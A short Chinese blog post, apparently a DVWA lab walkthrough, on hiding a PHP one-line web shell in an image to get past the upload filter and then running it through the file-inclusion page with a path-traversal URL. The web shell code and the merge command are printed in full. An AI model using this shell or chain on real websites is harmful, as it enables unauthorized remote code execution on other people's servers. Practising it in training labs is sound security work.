前提:因为php的include函数可以提高代码复用率,但是如果有使用include函数包含而又未作出安全的限制,那么我们就有机会利用include函数配合文件上传直接执行我们上传的代码文件
首先需要绕过high模式文件上传的限制,常规的就是制作图片木马,方式有几种:
- 使用类似edjpgcom这种工具直接插入
- 使用notepad++直接打开图片,在最后加上一句话木马
- 在windows下使用dos命令 dos copy/b 图片名.jpg+代码文件名.php 新生成的木马图片名.jpg
假设我的一句话木马123.php:
<?php @eval($_POST['cmd']) ?>
成功上传了图片后,想直接执行是不能的,只能配合文件包涵漏洞来执行。比如在dvwa中的文件包涵页面URL明显有include=filename,所以我们直接改成我们上传的文件,这里要注意路径问题,因为dvwa我们一般都知道路径就是../upload/123.php,但如果不知道的话我们直接../../../../../../../../../var/www/dvwa/vulnerabilities/upload/123.php
之后是直接在浏览器通过类似?cmd=传参还是菜刀连接获取webshell都可以。
Comments | NOTHING